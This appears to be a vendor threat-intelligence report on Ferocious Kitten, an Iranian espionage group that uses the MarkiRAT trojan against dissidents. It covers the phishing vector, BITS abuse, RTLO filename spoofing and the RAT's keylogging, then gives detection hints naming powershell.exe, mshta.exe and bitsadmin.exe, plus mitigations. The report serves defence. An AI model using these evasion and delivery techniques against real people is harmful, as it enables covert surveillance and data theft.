Executive Summary

New research from Picus Security has shed light on the ongoing operations of Ferocious Kitten, an Iranian advanced persistent threat (APT) group active since at least 2015. The group's primary mission is cyber-espionage, specifically targeting Iranian dissidents and activists. Their main tool is a custom-built remote access trojan (RAT) called MarkiRAT, which is delivered via spear-phishing campaigns. MarkiRAT is a potent surveillance tool designed for stealth and extensive data collection, featuring an intelligent keylogger, clipboard monitoring, and multiple defense evasion techniques. The group's sustained activity and specialized toolset demonstrate a dedicated, state-aligned effort to monitor and suppress political opposition.

Threat Overview

• Threat Actor: Ferocious Kitten (APT-C-50)
• Alignment: Iranian
• Targets: Iranian dissidents, activists, and individuals of interest to the Iranian regime.
• Malware: MarkiRAT, a custom RAT.
• Primary Vector: Spear-phishing emails containing malicious Microsoft Office documents.

Ferocious Kitten's campaigns are highly targeted. They use social engineering to craft convincing lures, often disguising their malicious documents as political papers or other content relevant to their targets. This focused approach increases the likelihood of a successful compromise.

Technical Analysis

The attack chain employed by Ferocious Kitten is methodical and designed for stealth:

1. Initial Access (T1566.001 - Spearphishing Attachment): The attack begins with a spear-phishing email containing a malicious Microsoft Office document. The document is weaponized using either embedded macros (T1059.005 - Visual Basic) or by exploiting known vulnerabilities like the MSHTML engine flaw (CVE-2021-40444).
2. Execution & Deployment: Once the victim opens the document and enables content, the payload executes, downloading and installing the MarkiRAT malware.
3. Surveillance & Data Collection: MarkiRAT provides the attackers with extensive surveillance capabilities:
   • Keystroke & Clipboard Logging (T1056.001 - Keylogging): The RAT includes an advanced logger that reportedly only activates when it detects the victim is not using a password manager, making it more stealthy.
   • File & Data Collection (T1005 - Data from Local System): The malware can search for and exfiltrate specific files from the compromised system.
4. Command and Control (T1071.001 - Web Protocols): MarkiRAT communicates with its C2 servers using standard HTTP and HTTPS GET/POST requests, which helps it blend in with normal web traffic.
5. Defense Evasion & Persistence: Ferocious Kitten employs several techniques to remain undetected:
   • BITS Jobs (T1197 - BITS Jobs): Abusing the legitimate Windows Background Intelligent Transfer Service (BITS) to download payloads or exfiltrate data.
   • Right-to-Left Override (RTLO) (T1564.002 - Hide Files and Directories): Using the RTLO Unicode character to disguise a malicious executable's file extension (e.g., making file.exe appear as file.txt).
   • App Directory Takeovers: A persistence technique where the malware places itself in a location that will be executed by a legitimate application.

Impact Assessment

The primary impact of Ferocious Kitten's operations is not financial but political and personal. For the targeted individuals:

• Loss of Privacy: The comprehensive surveillance capabilities of MarkiRAT result in a total loss of privacy, with attackers able to monitor all communications and activities.
• Physical Danger: For dissidents and activists, the information stolen by a state-aligned APT can lead to harassment, arrest, and physical harm.
• Chilling Effect: The knowledge of such surveillance can create a climate of fear, suppressing free speech and political opposition.

IOCs

Specific IOCs (hashes, domains) were not provided in the source articles, but the malware family name is a key indicator.

Detection & Response

1. EDR and Behavioral Analysis: Use an EDR solution to detect the TTPs used by Ferocious Kitten. Monitor for Office applications spawning suspicious child processes (e.g., powershell.exe, mshta.exe), the use of bitsadmin.exe, and files with the RTLO character. This aligns with D3FEND's Process Analysis.
2. Network Traffic Analysis: Monitor outbound HTTP/S traffic for patterns indicative of C2 communications. Look for regular beacons to the same IP/domain, even if the traffic is encrypted.
3. Email Security: Implement advanced email filtering to scan attachments for malicious macros and known exploits. Sandboxing attachments to observe their behavior before delivery is highly effective.

Mitigation

1. User Training (M1017 - User Training): Targeted individuals must be trained to be extremely cautious of unsolicited emails and attachments, even if they appear to come from a known contact.
2. Attack Surface Reduction (ASR): Configure Microsoft Office to block macros from the internet and implement ASR rules to prevent common exploit delivery mechanisms.
3. Endpoint Hardening: Disable or restrict scripting languages like PowerShell for standard users. Use application control to prevent the execution of unauthorized software.
4. Software Updates (M1051 - Update Software): Keep operating systems and applications, especially Microsoft Office and web browsers, fully patched to prevent exploitation of known vulnerabilities.